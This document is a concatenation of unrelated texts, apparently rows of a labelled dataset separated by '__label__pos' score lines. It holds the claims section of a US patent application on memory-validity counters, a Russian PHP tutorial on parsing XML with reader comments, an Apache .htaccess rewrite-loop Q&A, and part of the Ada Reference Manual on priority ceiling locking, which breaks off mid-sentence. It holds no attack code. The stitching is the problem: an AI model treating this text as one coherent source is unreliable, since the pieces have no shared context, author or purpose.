storage system 618, which communicate with each other via a bus 630. Processing device 602 represents one or more general-purpose processing devices such as a microprocessor, a central processing unit, or the like. More particularly, the processing device can be a complex instruction set computing (CISC) microprocessor, reduced instruction set computing (RISC) microprocessor, very long instruction word (VLIW) microprocessor, or a processor implementing other instruction sets, or processors implementing a combination of instruction sets. Processing device 602 can also be one or more special-purpose processing devices such as an application specific integrated circuit (ASIC), a field programmable gate array (FPGA), a digital signal processor (DSP), network processor, or the like. The processing device 602 is configured to execute instructions 626 for performing the operations and steps discussed herein. The computer system 600 can further include a network interface device 608 to communicate over the network 620. The data storage system 618 can include a machine-readable storage medium 624 (also known as a computer-readable medium) on which is stored one or more sets of instructions 626 or software embodying any one or more of the methodologies or functions described herein. The instructions 626 can also reside, completely or at least partially, within the main memory 604 and/or within the processing device 602 during execution thereof by the computer system 600, the main memory 604 and the processing device 602 also constituting machine-readable storage media. The machine-readable storage medium 624, data storage system 618, and/or main memory 604 can correspond to the memory subsystem 110 of FIG. 1. In one embodiment, the instructions 626 include instructions to implement functionality corresponding to a reclamation manager component (e.g., the reclamation manager component 113 of FIG. 1). While the machine-readable storage medium 624 is shown in an example embodiment to be a single medium, the term “machine-readable storage medium” should be taken to include a single medium or multiple media that store the one or more sets of instructions. The term “machine-readable storage medium” shall also be taken to include any medium that is capable of storing or encoding a set of instructions for execution by the machine and that cause the machine to perform any one or more of the methodologies of the present disclosure. The term “machine-readable storage medium” shall accordingly be taken to include, but not be limited to, solid-state memories, optical media, and magnetic media. Some portions of the preceding detailed descriptions have been presented in terms of algorithms and symbolic representations of operations on data bits within a computer memory. These algorithmic descriptions and representations are the ways used by those skilled in the data processing arts to most effectively convey the substance of their work to others skilled in the art. An algorithm is here, and generally, conceived to be a self-consistent sequence of operations leading to a desired result. The operations are those requiring physical manipulations of physical quantities. Usually, though not necessarily, these quantities take the form of electrical or magnetic signals capable of being stored, combined, compared, and otherwise manipulated. It has proven convenient at times, principally for reasons of common usage, to refer to these signals as bits, values, elements, symbols, characters, terms, numbers, or the like. It should be borne in mind, however, that all of these and similar terms are to be associated with the appropriate physical quantities and are merely convenient labels applied to these quantities. The present disclosure can refer to the action and processes of a computer system, or similar electronic computing device, that manipulates and transforms data represented as physical (electronic) quantities within the computer system's registers and memories into other data similarly represented as physical quantities within the computer system memories or registers or other such information storage systems. The present disclosure also relates to an apparatus for performing the operations herein. This apparatus can be specially constructed for the intended purposes, or it can include a general-purpose computer selectively activated or reconfigured by a computer program stored in the computer. For example, a computer system or other data processing system, such as the controller 115, may carry out the computer-implemented method 500 in response to its processor executing a computer program (e.g., a sequence of instructions) contained in a memory or other non-transitory machine-readable storage medium. As another example, a computer system or other data processing system, such as the processor 121, may carry out the computer-implemented method 300 in response to its processor executing a computer program (e.g., a sequence of instructions) contained in a memory or other non-transitory machine-readable storage medium. Such a computer program can be stored in a computer readable storage medium, such as, but not limited to, any type of disk including floppy disks, optical disks, CD-ROMs, and magnetic-optical disks, read-only memories (ROMs), random access memories (RAMs), EPROMs, EEPROMs, magnetic or optical cards, or any type of media suitable for storing electronic instructions, each coupled to a computer system bus. The algorithms and displays presented herein are not inherently related to any particular computer or other apparatus. Various general-purpose systems can be used with programs in accordance with the teachings herein, or it can prove convenient to construct a more specialized apparatus to perform the method. The structure for a variety of these systems will appear as set forth in the description below. In addition, the present disclosure is not described with reference to any particular programming language. It will be appreciated that a variety of programming languages can be used to implement the teachings of the disclosure as described herein. The present disclosure can be provided as a computer program product, or software, that can include a machine-readable medium having stored thereon instructions, which can be used to program a computer system (or other electronic devices) to perform a process according to the present disclosure. A machine-readable medium includes any mechanism for storing information in a form readable by a machine (e.g., a computer). In some embodiments, a machine-readable (e.g., computer-readable) medium includes a machine (e.g., a computer) readable storage medium such as a read only memory (“ROM”), random access memory (“RAM”), magnetic disk storage media, optical storage media, flash memory components, etc. In the foregoing specification, embodiments of the disclosure have been described with reference to specific example embodiments thereof. It will be evident that various modifications can be made thereto without departing from the broader spirit and scope of embodiments of the disclosure as set forth in the following claims. The specification and drawings are, accordingly, to be regarded in an illustrative sense rather than a restrictive sense. Claims 1. A method comprising: reading, by a computer device, an indicator from a configuration file, the indicator identifying a granularity of units of data at which to track validity, wherein the granularity is one of a plurality of granularities ranging from one unit of data to many units of data; generating, by the computer device, a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters tracking validity of a group of units of data at the identified granularity; and transferring the machine-readable file from the computer device to a memory of the memory system. 2. The method of claim 1, wherein if the granularity identifies a first granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and a physical-to-logical address translation table. 3. The method of claim 1, wherein if the granularity identifies a second granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and excludes a physical-to-logical address translation table. 4. The method of claim 1, wherein the machine-readable file is further configured to cause the processing device to provision space in a volatile memory for a validity table, the validity table storing a value of each validity counter in the plurality of data validity counters. 5. The method of claim 4, wherein the machine-readable file is further configured to cause the processing device to update a first value of a first validity counter in the validity table when a first unit of data within the group of units of data tracked by the first validity counter is flagged as stale. 6. The method of claim 4, wherein the machine-readable file is further configured to cause the processing device to reclaim a portion of a non-volatile memory array based in part on the validity table. 7. The method of claim 6, wherein to reclaim the portion of the non-volatile memory array comprises: reading a value of a first validity counter in the plurality of validity counters from the validity table, the first validity counter tracking validity of a first group of units of data at the identified granularity; if the value of the first validity counter is not equal to zero or to a total number of units of data of the identified granularity: reading metadata associated with the first group of units of data; determining a first physical address of a first unit of data within the first group of units of data from a logical-to-physical address lookup based on a logical address of the first unit of data stored within the metadata; determining a second physical address of the first unit of data within the first group of units of data based on a location of the first unit of data within the first group of units of data; and if the first physical address matches the second physical address, moving the first unit of data in the non-volatile memory array. 8. A non-transitory computer-readable storage medium comprising instructions that, when executed by a computer device, cause the computer device to: read an indicator from a configuration file, the indicator identifying a granularity of units of data at which to track validity, wherein the granularity is one of a plurality of granularities ranging from one unit of data to many units of data; generate a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters to track validity of a group of units of data at the identified granularity; and transfer the machine-readable file to a memory of the memory system. 9. The non-transitory computer-readable medium of claim 8, wherein if the granularity identifies a first granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and a physical-to-logical address translation table. 10. The non-transitory computer-readable medium of claim 8, wherein if the granularity identifies a second granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and excludes a physical-to-logical address translation table. 11. The non-transitory computer-readable medium of claim 8, wherein the machine-readable file is further configured to cause the processing device to provision space in a volatile memory for a validity table, the validity table to store a value of each validity counter in the plurality of data validity counters. 12. The non-transitory computer-readable medium of claim 11, wherein the machine-readable file is further configured to cause the processing device to update a first value of a first validity counter in the validity table when a first unit of data within the group of units of data tracked by the first validity counter is flagged as stale. 13. The non-transitory computer-readable medium of claim 11, wherein the machine-readable file is further configured to cause the processing device to reclaim a portion of a non-volatile memory array based in part on the validity table. 14. The non-transitory computer-readable medium of claim 13, wherein to reclaim a portion of the non-volatile memory array, the processing device is to: read a value of a first validity counter in the plurality of validity counters from the validity table, the first validity counter to track validity of a first group of units of data at the identified granularity; if the value of the first validity counter is not equal to zero or to a total number of units of data of the identified granularity: read metadata associated with the first group of units of data; determine a first physical address of a first unit of data within the first group of units of data from a logical-to-physical address lookup based on a logical address of the first unit of data stored within the metadata; determine a second physical address of the first unit of data within the first group of units of data based on a location of the first unit of data within the first group of units of data; and if the first physical address matches the second physical address, move the first unit of data in the non-volatile memory array. 15. A system comprising: a processing device of a memory subsystem; and a computer device, operatively coupled with the processing device, to: read an indicator from a configuration file, the indicator identifying a granularity of units of data at which to track validity, wherein the granularity is one of a plurality of granularities ranging from one unit of data to many units of data; generate a machine-readable file configured to cause a processing device of a memory system to track validity at the identified granularity using a plurality of data validity counters, each data validity counter in the plurality of data validity counters to track validity of a group of units of data at the identified granularity; and transfer the machine-readable file to a memory of the memory system. 16. The system of claim 15, wherein if the granularity identifies a first granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and a physical-to-logical address translation table. 17. The system of claim 15, wherein if the granularity identifies a second granularity from the plurality of granularities, the machine-readable file is further configured to cause the processing device to provision space in a non-volatile memory array for a logical-to-physical address translation table and excludes a physical-to-logical address translation table. 18. The system of claim 15, wherein the machine-readable file is further configured to cause the processing device to provision space in a volatile memory for a validity table, the validity table to store a value of each validity counter in the plurality of data validity counters. 19. The system of claim 18, wherein the machine-readable file is further configured to cause the processing device to update a first value of a first validity counter in the validity table when a first unit of data within the group of units of data tracked by the first validity counter is flagged as stale. 20. The system of claim 18, wherein the machine-readable file is further configured to cause the processing device to reclaim a portion of a non-volatile memory array based in part on the validity table. Patent History Publication number: 20200050556 Type: Application Filed: Aug 10, 2018 Publication Date: Feb 13, 2020 Patent Grant number: 10795828 Inventors: Boon Leong Yeap (Broomfield, CA), Karl D. Schuh (Santa Cruz, CA) Application Number: 16/101,288 Classifications International Classification: G06F 12/14 (20060101); G06F 3/06 (20060101); G06F 12/02 (20060101); G06F 17/30 (20060101);
__label__pos
0.911311
Использование XML в PHP Эта статья, как Вы уже скорее всего поняли из названия, посвящена тому, как можно использовать XML для хранения данных, которые будут использоваться из скриптов, написанных на PHP. Бедем считать, что Вы уже знаете, что такое XML и с чем его едят. Примеры к статье Вы можете скачать . Наш план такой. Сначала мы узнаем, какие функции есть для работы с XML в PHP и как ими пользоваться. Чтобы это лучше понять, мы рассмотрим небольшой скрипт, который будет отображать структуру нашего XML-документа. Приступим. Не хочу я нудно и долго рассказывать общие слова про то, как работать с XML в PHP, лучше давайте разберем это все на примере. Итак, постановка задачи: написать скрипт, который будет показывать структуру XML-документа. В примерах это файл xml.php. Сначала создадим XML-документ (в примерах это test.xml). Пусть в этом файле будут описываться фотографии. Особо мудрить мы не будем, и обойдемся без описания DTD (не путать с DDT :)). Здесь появляется первая неприятная особенность PHP: XML-документы, которые должны обрабатываться из скрипта могут буть написаны в следующих кодировках: US-ASCII, ISO-8859-1 и UTF-8. Т.к. нам нужно описывать фотографии по-русски, то придется выбрать последнюю кодировку, т.к. в первых друх нет русских букв. Не все текстовые редакторы могут работать с этой кодировкой. Я, например, набирал XML в редакторе SciTE. Он маленький, бесплатный и у него хорошая подсветка синтаксиса (в том числе PHP и XML). Наш XML-документ будет выглядеть так:  <?xml version="1.0" encoding="UTF-8"?>  <album>      <foto smallfoto="Fotos/1smallvelo.jpg " bigfoto="Fotos/1bigvelo.jpg ">          <title>Название 1</title>          <comment>Длинный комментарий                 на несколько строк 1</comment>          <date>26.05.2003</date>          <color/>          <detailed>0</detailed>      </foto>      <foto smallfoto="Fotos/smallbardak.jpg " bigfoto="Fotos/bigbardak.jpg ">          <title>Название 2</title>          <comment> Длинный комментарий                 на несколько строк 2</comment>          <date>27.05.2003</date>          <color/>          <detailed>1</detailed>      </foto>  </album> "Физический" смысл тегов в XML сейчас значения не имеет (хотя там вроде и так все понятно). Единственное, что только <color/> здесь может обозначать цветная фотка или нет. Это здесь только для примера тега, у которого нет закрывающегося. А теперь напишем скрипт, который показывал бы структуру XML-документа. Для работы с XML в PHP есть больше 20 функций. Рассмотрим для начала самые необходимые. Вот этот скрипт:  <?      $xmlfilename = "test.xml";      $code = "UTF-8";                            // Кодировка xml-а      $curcode = "Windows-1251";                  // Текущая кодировка      $level = 0;                                 // Уровень вложенности      $list = array();                            // Список элементов в xml-файле      // Преобразует строку из Unicode      function encoding ($str)      {          global $code;          global $curcode;          $str = mb_convert_encoding($str, $curcode, $code);          return $str;      }      function drawspace()      {          global $level;          for ($i = 0; $i < $level * 10; $i++)          {              echo " ";          }            }      // Обрабатывает текст между тегами      function characterhandler ($parser, $data)      {          global $code;          global $curcode;          drawspace();          $data = encoding($data, $curcode, $code);          $data = trim($data)."<br>";          echo $data;      }      // Обрабатывает открывающиеся теги      function starthandler ($parser, $name, $attribs)      {          global $level;          global $list;          global $code;          global $curcode;          $name = encoding($name, $curcode, $code);          $list[] = $name;          drawspace();          echo "<font color='blue' size='+1'>$name</font>";          foreach ($attribs as $atname => $val)          {              echo encoding("$atname => $val");          }          echo "><br>";          $level++;      }      // Обрабатывает закрывающиеся теги      function endhandler ($parser, $name)      {          global $level;          global $list;          array_pop($list);          $level--;          drawspace();          echo "<font color='blue' size='+1'>/$name</font><p>";      }      // Создадим парсер      $parser = xml_parser_create($code);      if (!$parser)      {          exit ("Не могу создать парсер");      }      else      {          echo "Парсер успешно создан<p>";      }      // Установим обработчики тегов и текста между ними      xml_set_element_handler($parser, 'starthandler', 'endhandler');      xml_set_character_data_handler($parser, 'characterhandler');      // Откроем файл с xml      $fp = fopen ($xmlfilename, "r");      if (!$fp)      {          xml_parser_free($parser);          exit("Не могу открыть файл");      }      while ($data = fread($fp, 4096))      {          if (!xml_parse($parser, $data, feof($fp)))          {                die(sprintf("Ошибочка вышла: %s в строке %d",                         xml_error_string(xml_get_error_code($parser)),                             xml_get_current_line_number($parser)));          }      }      fclose ($fp);      xml_parser_free($parser);  ?> После объявлений вспомогательных функций, необходимо в первую очередь создать парсер. Это можно сделать одной из функциий xml_parser_create или xml_parser_create_ns. Первая имеет один необязательный параметр, который обозначает кодировку, в которой написан XML-документ. Если его не указать, то по-умолчанию считается, что он написан как ISO-8859-1. Но, как я писал выше, это нам не подходит и мы выбирает UTF-8. Т.к. обозначение этой кодировки нам еще понадобится, то вынесем ее в глобальную переменную ($code = "UTF-8";). Также вынесем туда кодировку, в которой будет выводиться текст в браузер ($curcode = "Windows-1251";). Функция xml_parser_create_ns имеет дополнительный (тоже необязательный) параметр, который обозначает символ, которым в документе будут разделяться пространства имен. Т.к. нам сейчас это не надо, то мы воспользовались первой функцией. Если парсер создан успешно, то паременная $parser получит значение, отличное от нуля. После этого надо указать парсеру XML, какие функции вызывать при появлении в тексте тегов XML. В нашем примере это сделано так:      // Установим обработчики тегов и текста между ними      xml_set_element_handler($parser, 'starthandler', 'endhandler');      xml_set_character_data_handler($parser, 'characterhandler'); Функция xml_set_element_handler устанавливает обработчики для открывающихся и закрывающихся тегов. В качестве первого параметра им передается парсер, который мы создали до этого. А в качестве второго и третьего - имена функций, которые будут вызываться по мере того, как будут попадаться открывающиеся и закрывающиеся тего соответственно. Эти функции должны быть определены определенным образом. Функция для открывающихся тегов должна выглядеть примерно так:      // Обрабатывает открывающиеся теги  function starthandler ($parser, $name, $attribs)  {  } При ее вызове ей передаются парсер, который мы создали, имя обрабатываемого тега и его атрибуты (то, что находится в угловых скобках после имени). Если с именем никаких особенностей нет, то атрибуты передаются как ассоциативный массив, т.е. в виде ключ => значение. Поэтому мы их и обрабатываем следующим образом:      foreach ($attribs as $atname => $val)      {          echo encoding("$atname => $val");      } Все тоже самое и для закрывающихся тегов, только функции не передаются атрибуты, которых в принципе быть не может у закрывающегося тега:  function endhandler ($parser, $name)  {  } Тут есть одна интересная деталь. Даже если у тега нет закрывающегося, то вторая функция все-равно вызывается. Если Вы посмотрите на работу скрипта, то увидите, что для тега <color/> у нас получилось: <COLOR> </COLOR> А чтобы обрабатывать текст, который располагается между тегами, надо установить соответствующий обработчик функцией xml_set_character_data_handler. Ей пользоваться точно так же, только ее вторым аргументом должно быть имя функции, которая объявлена таким образом:  function characterhandler ($parser, $data) То есть так же, как и для закрывающегося тега. Именно в нее передаются все данные наподобие "Название 1" или "Длинный комментарий на несколько строк 2" из нашего примера. Ну и, наконец, самое главное - как читать XML-документ. Оказывается просто - как обычный текстовый файл. Т.е. открываем его функцией fopen, например так:  $fp = fopen ($xmlfilename, "r"); И читаем из него все строки, которые потом передаем в функцию xml_parse:  while ($data = fread($fp, 4096))  {      if (!xml_parse($parser, $data, feof($fp)))      {          die(sprintf("Ошибочка вышла: %s в строке %d",                      xml_error_string(xml_get_error_code($parser)),                      xml_get_current_line_number($parser)));      }  } У xml_parse три аргумента. Первый - переменная созданного нами раньше парсера, второй - прочитанная строка, а третий (необязательный) - признак того, что пора заканчивать парсить (вот мы туда и передаем значение того, кончился ли файл). У нас еще вставлена проверка ошибок. Там вроде все ясно из названия. xml_get_error_code возвращает код ошибки, по которому xml_error_string создает строку, которая описывает эту ошибку. После всего этого надо не забыть уничтожить парсер. Это делается функцией xml_parser_free:  xml_parser_free($parser); Теперь одна из самых неприятных особенностей. Т.к. мы писали XML как Unicode, то и строки нам передаются в той же кодировке. А так как обычно сайт строят на более привычной кодировке (Koi8, Windows), то с этим Unicod'ом надо что-то делать. И вот здесь начинается самое неприятное. В расширении PHP, которое отвечает за XML, есть две функции для перекодировки UTF-8. Это функция utf8_decode, которая преобразует строку из UTF-8, и функция utf8_encode, которая наоборот преобразует в UTF-8. Но они нам не подходят по той причине, что могут работать с кодировкой ISO-8859-1, в которой нет русских букв. К счастью, разработчики PHP все-таки сделали функции, которые могут без проблем работать и с другими кодировками - это mb_convert_encoding. В данном случае мы ее использовали так:  $str = mb_convert_encoding($str, $curcode, $code); $curcode и $code это переменные, в которых храняться названия кодировок (помните, мы их раньше объявили глобальными?). С этой функцией все понятно: первый аргумент - это исходная строка, второй - название кодировки, в которую преобразуем, а третий аргумент (необязательный) - кодировка, из которой преобразуем. Функция возвращает нам новую строку. Казалось бы, что все хорошо, есть функция, она здорово работает (это действительно так), но, чтобы она работала, надо, чтобы было подключено расширение к PHP - mbstring (multi byte string). Для этого, если вы работаете из Windows, в файле php.ini надо раскомментировать строку extension=php_mbstring.dll. Но если дома это сделать несложно, то вот на хостинге, где расположен Ваш сайт, оно (расширение) может быть не подключено. Именно поэтому я вынес перекодировку в отдельную функцию, чтобы ее можно было легко исправить:  // Преобразует строку из Unicode  function encoding ($str)  {      global $code;      global $curcode;      $str = mb_convert_encoding($str, $curcode, $code);      return $str;  } Это были самые простые функции для работы с XML. Чтобы было интереснее, в нашем скрипте я считаю уровень вложенности для тегов (это для того, чтобы правильно смещать текст вправо) и еще в глобальную переменную $list заносятся открывающиеся теги, а при появлении закрывающегося - выбрасывается последний элемент. Т.о. в $list хранится путь по которому мы прошли до текущего тега, а сам этот тег находится в конце списка. Теперь давайте немного побалуемся и посмотрим, как работает обработка ошибок. Уберем из тега color слеш. То есть оставим <color>, как будто мы забыли его закрыть. И вот что нам выдает PHP: "Ошибочка вышла: mismatched tag в строке 16". И на этом обработка прекращается. Также "mismatched tag" будет, если мы перенесем закрывающийся тег <data/> после тега <foto/>. Поиграемся с кодировками. Если сохранить наш XML-документ в кодировке Windows-1251 и честно это указать в заголовке <?xml version="1.0" encoding="Windows-1251"?> (не забудьте исправить соответствующую глобальную переменную в скрипте), то PHP... благополучно вылетает :) По крайней мере, так было у меня. Я этот скрипт испытывал на такой конфигурации: Win2000 + SP3; Apache 1.3.27; PHP 4.3.1. На этом пока вроде бы все. Вы можете подписаться на новости сайта через RSS, Группу Вконтакте или Канал в Telegram. 4.5 stars Рейтинг 4.4/5. Всего 8 голос(а, ов) h11od-ALeX 20.06.2012 - 12:29 XML PHP Спасибо. Очень помогло! grinning smiley Подписаться на комментарии Автор: Тема:  Ваш комментарий     Введите код 190   anaconda 24.10.2007 - 19:15 кул мануал автору зачёт за ртфм!happy smiley NA 30.05.2008 - 14:32 XML Очень интересная статья! Вы не могли бы порекомендовать для новичков что-нибудь о выведении данных из XML при поиске по XML документу на страничку интернета.Мы ученые, создаем сайт по архивам, которые обработаны в XML.А нанимать технологов, которые делают поисковик очень дорого.Есть что-нибудь такое, что доступно сознанию простых ученых? Jenyay 30.05.2008 - 17:40 To NA: Конкретную статью не скажу, но посмотрите в сторону XPath. Думаю, в инете найдутся хорошие статьи по этой теме (хотя я с XPath разбирался по MSDN). Дмитрий 06.11.2008 - 00:17 Не работает Я сделал два файла один-в-один как в примере и у меня не работает. Вижу только "Парсер успешно создан". Мож подскажите что не так? Jenyay 06.11.2008 - 09:23 Постараюсь в ближайшее время посмотреть. А то эту статью писал так давно, что уже и сам не помню что я тут делал :) Jenyay 12.11.2008 - 21:06 Дмитрий Извините, что долго не отвечал. Пробовал разные варианты, но так и не смог добиться того, чтобы после надписи об успешно созданном парсере ничего не выводилось. Выводится или ошибка, или текст. Ricken 31.10.2009 - 19:03 Спасибо! Не мог найти решение с кодировкой в php+xml пока не наткнулся на Вашу статью. Ф-я mb_convert_encoding() решила проблему. Ещё раз спасибо!
__label__pos
0.526474
2 I want to have all the URLs on my site handled by a single script. So I put in a rewrite rule like this: RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule (.*) /myscript.php?p=$1 [L] But I don't want to allow access to my script on URLs that actually contain "myscript.php" in them so I would like to redirect those back to the main site: Redirect 301 /myscript.php http://example.com/ The problem is that if I put both of those rules into my .htaccess file it causes an infinite loop. How do I get them both to work at the same time? I would also like to be able to redirect things like: /myscript.php?p=foo -> /foo 1 Using an environment variable is perfectly OK, however, you don't need to manually set this environment variable yourself. Apache provides the REDIRECT_STATUS environment variable which can be used for this purpose. REDIRECT_STATUS is empty (or not set) on the initial request. It is set to 200 on the first (successful) internal rewrite. Or some other HTTP status code in the case of an error (404 etc.). So, instead of checking that REDIRECT_LOOP is not 1, we can simply check that REDIRECT_STATUS is empty to ensure we are testing the initial request and not the rewritten request. For example: RewriteCond %{ENV:REDIRECT_STATUS} ^$ RewriteRule ^myscript\.php$ / [R,L] (Note that it is just REDIRECT_STATUS, there is no STATUS variable at the start of the request.) RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !myscript\.php RewriteRule (.*) /test/myscript.php?p=$1 [L,E=LOOP:1] Aside: The RewriteCond directive that checks against the REQUEST_URI doesn't really do anything here. If the first condition is true (ie. it's not a file), then this condition must also be true. However, it could be optimised by including this condition first. This would then avoid the file check on every request (including the rewritten request). For example: RewriteCond %{REQUEST_URI} !^/test/myscript\.php RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule (.*) /test/myscript.php?p=$1 [L] Or, you could include a pre-check (an exception) before this rule instead that halts processing when myscript.php is requested: RewriteRule ^test/myscript\.php$ - [L] However, if you do this, then the above canonical redirects must appear before these rules, otherwise they will never be processed. (Putting the canonical redirects first is generally preferable anyway.) 4 You can set an environment variable RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !myscript\.php RewriteRule (.*) /myscript.php?p=$1 [L,E=LOOP:1] and test for that in your second rule RewriteCond %{ENV:REDIRECT_LOOP} !1 RewriteRule ^myscript\.php$ / [R,L] Never test with 301 enabled, see this answer Tips for debugging .htaccess rewrite rules for details. Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.78894
Skip to main content D.3 Priority Ceiling Locking danger This Reference Manual output has not been verified, and may contain omissions or errors. Report any problems on the tracking issue 1/3 [This subclause specifies the interactions between priority task scheduling and protected object ceilings. This interaction is based on the concept of the ceiling priority of a protected object.] Syntax 2 The form of a pragma Locking_Policy is as follows: 3 pragma Locking_Policy(policy_identifier); Legality Rules 4 The policy_identifier shall either be Ceiling_Locking or an implementation-defined identifier. 4.a implementation defined Implementation-defined policy_identifiers allowed in a pragma Locking_Policy. Post-Compilation Rules 5 A Locking_Policy pragma is a configuration pragma. Dynamic Semantics 6/2 {8652/0073} [A locking policy specifies the details of protected object locking. All protected objects have a priority. The locking policy specifies the meaning of the priority of a protected object, and the relationships between these priorities and task priorities. In addition, the policy specifies the state of a task when it executes a protected action, and how its active priority is affected by the locking.] The locking policy is specified by a Locking_Policy pragma. For implementation-defined locking policies, the meaning of the priority of a protected object is implementation defined. If no Locking_Policy pragma applies to any of the program units comprising a partition, the locking policy for that partition, as well as the meaning of the priority of a protected object, are implementation defined. 6.a/2 implementation defined The locking policy if no Locking_Policy pragma applies to any unit of a partition. 6.1/3 The expression specified for the Priority or Interrupt_Priority aspect (see D.1) is evaluated as part of the creation of the corresponding protected object and converted to the subtype System.Any_Priority or System.Interrupt_Priority, respectively. The value of the expression is the initial priority of the corresponding protected object. If no Priority or Interrupt_Priority aspect is specified for a protected object, the initial priority is specified by the locking policy. 7 There is one predefined locking policy, Ceiling_Locking; this policy is defined as follows: 8/3 • Every protected object has a ceiling priority, which is determined by either a Priority or Interrupt_Priority aspect as defined in D.1, or by assignment to the Priority attribute as described in D.5.2. The ceiling priority of a protected object (or ceiling, for short) is an upper bound on the active priority a task can have when it calls protected operations of that protected object. • 9/2 • The initial ceiling priority of a protected object is equal to the initial priority for that object. • 10/4 • If an Interrupt_Handler or Attach_Handler aspect (see C.3.1) is specified for a protected subprogram of a protected type that does not have either the Priority or Interrupt_Priority aspect specified, the initial priority of protected objects of that type is implementation defined, but in the range of the subtype System.Interrupt_Priority. 10.a implementation defined Default ceiling priorities. 11/3 • If neither aspect Priority nor Interrupt_Priority is specified for a protected type, and no protected subprogram of the type has aspect Interrupt_Handler or Attach_Handler specified, then the initial priority of the corresponding protected object is System.Priority'Last. • 12 • While a task executes a protected action, it inherits the ceiling priority of the corresponding protected object. • 13 • When a task calls a protected operation, a check is made that its active priority is not higher than the ceiling of the corresponding protected object; Program_Error is raised if this check fails. 13.1/5 If the task dispatching policy specified for the ceiling priority of a protected object is EDF_Within_Priorities, the following additional rules apply: 13.2/5 • Every protected object has a relative deadline, which is determined by a Relative_Deadline aspect as defined in D.2.6, or by assignment to the Relative_Deadline attribute as described in D.5.2. The relative deadline of a protected object represents a lower bound on the relative deadline a task may have when it calls a protected operation of that protected object. • 13.3/5 • If aspect Relative_Deadline is not specified for a protected type then the initial relative deadline of the corresponding protected object is Ada.Real_Time.Time_Span_Zero. • 13.4/5 • While a task executes a protected action on a protected object P, it inherits the relative deadline of P. In this case, let DF be 'now' ('now' is obtained via a call on Ada.Real_Time.Clock at the start of the action) plus the deadline floor of P. If the active deadline of the task is later than DF, its active deadline is reduced to DF[; the active deadline is unchanged otherwise]. • 13.5/5 • When a task calls a protected operation, a check is made that its active deadline minus its last release time is not less than the relative deadline of the corresponding protected object; Program_Error is raised if this check fails. Bounded (Run-Time) Errors 13.6/5 Following any change of priority, it is a bounded error for the active priority of any task with a call queued on an entry of a protected object to be higher than the ceiling priority of the protected object. In this case one of the following applies: 13.7/5 • at any time prior to executing the entry body, Program_Error is raised in the calling task; • 13.8/5 • when the entry is open, the entry body is executed at the ceiling priority of the protected object; • 13.9/5 • when the entry is open, the entry body is executed at the ceiling priority of the protected object and then Program_Error is raised in the calling task; or • 13.10/5 • when the entry is open, the entry body is executed at the ceiling priority of the protected object that was in effect when the entry call was queued. 13.a.1/2 ramification Note that the error is “blamed” on the task that did the entry call, not the task that changed the priority of the task or protected object. This seems to make sense for the case of changing the priority of a task blocked on a call, since if the Set_Priority had happened a little bit sooner, before the task queued a call, the entry-calling task would get the error. Similarly, there is no reason not to raise the priority of a task that is executing in an abortable_part, so long as its priority is lowered before it gets to the end and needs to cancel the call. The priority might need to be lowered to allow it to remove the call from the entry queue, in order to avoid violating the ceiling. This seems relatively harmless, since there is an error, and the task is about to start raising an exception anyway. Implementation Permissions 14 The implementation is allowed to round all ceilings in a certain subrange of System.Priority or System.Interrupt_Priority up to the top of that subrange, uniformly. 14.a discussion For example, an implementation might use Priority'Last for all ceilings in Priority, and Interrupt_Priority'Last for all ceilings in Interrupt_Priority. This would be equivalent to having two ceiling priorities for protected objects, “nonpreemptible” and “noninterruptible”, and is an allowed behavior. 14.b Note that the implementation cannot choose a subrange that crosses the boundary between normal and interrupt priorities. 15/5 Implementations are allowed to define other locking policies, but are not required to support specifying more than one locking policy per partition. 16 [Since implementations are allowed to place restrictions on code that runs at an interrupt-level active priority (see C.3.1 and D.2.1), the implementation may implement a language feature in terms of a protected object with an implementation-defined ceiling, but the ceiling shall be no less than Priority'Last.] 16.a implementation defined The ceiling of any protected object used internally by the implementation. 16.b proof This permission follows from the fact that the implementation can place restrictions on interrupt handlers and on any other code that runs at an interrupt-level active priority. 16.c The implementation might protect a storage pool with a protected object whose ceiling is Priority'Last, which would cause allocators to fail when evaluated at interrupt priority. Note that the ceiling of such an object has to be at least Priority'Last, since there is no permission for allocators to fail when evaluated at a noninterrupt priority. Implementation Advice 17 The implementation should use names that end with “_Locking” for implementation-defined locking policies. 17.a/2 implementation advice Names that end with “_Locking” should be used for implementation-defined locking policies. 18 NOTE 1 While a task executes in a protected action, it can be preempted only by tasks whose active priorities are higher than the ceiling priority of the protected object. 19 NOTE 2 If a protected object has a ceiling priority in the range of Interrupt_Priority, certain interrupts are blocked while protected actions of that object execute. In the extreme, if the ceiling is Interrupt_Priority'Last, all blockable interrupts are blocked during that time. 20/5 NOTE 3 As described in C.3.1, whenever an interrupt is handled by one of the protected procedures of a protected object, a check is made that its ceiling priority is in the Interrupt_Priority range. 21/5 NOTE 4 When specifying the ceiling of a protected object, a correct value is one that is at least as high as the highest active priority at which tasks can be executing when they call protected operations of that object. In determining this value the following factors, which can affect active priority, are relevant: the effect of Set_Priority, nested protected operations, entry calls, task activation, and other implementation-defined factors. 22 NOTE 5 Attaching a protected procedure whose ceiling is below the interrupt hardware priority to an interrupt causes the execution of the program to be erroneous (see C.3.1). 23 NOTE 6 On a single processor implementation, the ceiling priority rules guarantee that there is no possibility of deadlock involving only protected subprograms (excluding the case where a protected operation calls another protected operation on the same protected object). Extensions to Ada 95 23.a/2 All protected objects now have a priority, which is the value of the Priority attribute of 